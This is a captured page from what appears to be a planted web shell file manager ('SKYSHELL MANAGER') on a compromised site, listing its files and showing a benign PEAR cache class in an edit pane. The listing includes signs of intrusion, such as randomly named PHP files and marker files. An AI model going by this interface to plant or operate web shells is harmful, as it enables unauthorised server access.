📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: trifile.php
<?php // +----------------------------------------------------------------------+ // | PEAR :: Cache | // +----------------------------------------------------------------------+ // | Copyright (c) 1997-2004 The PHP Group | // +----------------------------------------------------------------------+ // | This source file is subject to version 2.0 of the PHP license, | // | that is bundled with this package in the file LICENSE, and is | // | available at through the world-wide-web at | // | http://www.php.net/license/2_02.txt. | // | If you did not receive a copy of the PHP license and are unable to | // | obtain it through the world-wide-web, please send a note to | // | license@php.net so we can mail you a copy immediately. | // +----------------------------------------------------------------------+ // | Authors: Ulf Wendel <ulf.wendel@phpdoc.de> | // | Sebastian Bergmann <sb@sebastian-bergmann.de> | // | Ian Eure <ieure@php.net> | // +----------------------------------------------------------------------+ // // $Id: trifile.php 184642 2005-04-18 19:05:01Z dufuz $ require_once 'Cache/Container/file.php'; /** * Tri-file cache. * * This cache container stores files with no special encoding to reduce overhead. * Expiration & user data are stored in seperate files, prefixed with a '.' and * suffixed with '.exp' & '.dat' respectively. * * See http://atomized.org/PEAR/Cache_trifile.html for more information. * * @author Ian Eure <ieure@php.net> * @version 1.0 */ class Cache_Container_trifile extends Cache_Container_file { /** * Fetch cached file. * * @param string $id Cache ID to fetch * @param string $group Group to fetch from * @return array 1-dimensional array in the format: expiration,data,userdata */ function fetch($id, $group) { $file = $this->getFilename($id, $group); if (PEAR::isError($file)) { return $file; } if (!file_exists($file)) { return array(null, null, null); } return array( file_get_contents($this->_getExpFile($file)), file_get_contents($file), file_get_contents($this->_getUDFile($file)) ); } /** * Get the file to store cache data in. * * @return string Cache data file name * @access private */ function _getFile($file) { $dir = dirname($file); $file = basename($file); return $dir.'/.'.$file; } /** * Get the file to store expiration data in. * * @return string Expiration data file name * @access private */ function _getExpFile($file) { return $this->_getFile($file).'.exp'; } /** * Get the file to store user data in. * * @return string User data file name * @access private */ function _getUDFile($file) { return $this->_getFile($file).'.dat'; } /** * Cache file * * @param string $id Cache ID * @param mixed $cachedata Data to cache * @param mixed $expires When the data expires * @param string $group Cache group to store data in * @param mixed $userdata Additional data to store * @return boolean true on success, false otherwise */ function save($id, $cachedata, $expires, $group, $userdata) { $this->flushPreload($id, $group); $file = $this->getFilename($id, $group); if (PEAR::isError($file)) { return $file; } if (PEAR::isError($res = $this->_saveData($file, $cachedata))) { return $res; } $expires = $this->getExpiresAbsolute($expires); if (PEAR::isError($res = $this->_saveData($this->_getExpFile($file), $expires))) { return $res; } if (PEAR::isError($res = $this->_saveData($this->_getUDFile($file), $userdata))) { return $res; } return true; } /** * Save data in a file * * @param string $file File to save data in * @param string $data Data to save * @return mixed true on success, Cache_Error otherwise */ function _saveData($file, $data) { // Save data if (!($fh = @fopen($file, 'wb'))) return new Cache_Error("Can't access '$file' to store cache data. Check access rights and path.", __FILE__, __LINE__); if ($this->fileLocking) { flock($fh, LOCK_EX); } fwrite($fh, $data); if ($this->fileLocking) { flock($fh, LOCK_UN); } fclose($fh); return true; } } ?>
Save